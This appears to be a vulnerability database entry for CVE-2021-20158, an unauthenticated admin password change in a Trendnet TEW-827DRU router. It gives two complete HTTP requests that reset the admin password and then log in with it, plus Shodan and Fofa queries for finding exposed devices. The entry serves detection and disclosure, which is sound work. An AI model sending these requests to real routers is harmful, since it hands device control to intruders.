🔙 목록으로 돌아가기

CVE-2021-20158: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change

TitleTrendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
Authorgy741
SeverityCritical
ImpactAn attacker with authenticated access can gain unauthorized control over the affected device.
RemediationUpgrade to the latest firmware version provided by Trendnet to fix the vulnerability.
CVSS Score9.8
EPSS Score0.8034
CVE IDCVE-2021-20158
CWE IDCWE-306
Shodan Queryhttp.html:"TEW-827DRU"http.html:"tew-827dru"
Fofa Querybody="tew-827dru"
Tags cve2021 cve disclosure router intrusive tenable trendnet vuln

🔍 Vulnerability Description

Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.

🌐 HTTP Request

POST /apply_sec.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/619.23 (KHTML, like Gecko) Version/15.3.85 Safari/619.23
Connection: close
Content-Length: 143
Accept-Encoding: gzip

ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=FjOKaxdB
POST /apply_sec.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Connection: close
Content-Length: 152
Accept-Encoding: gzip

html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=RmpPS2F4ZEI=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20158.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-20158.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A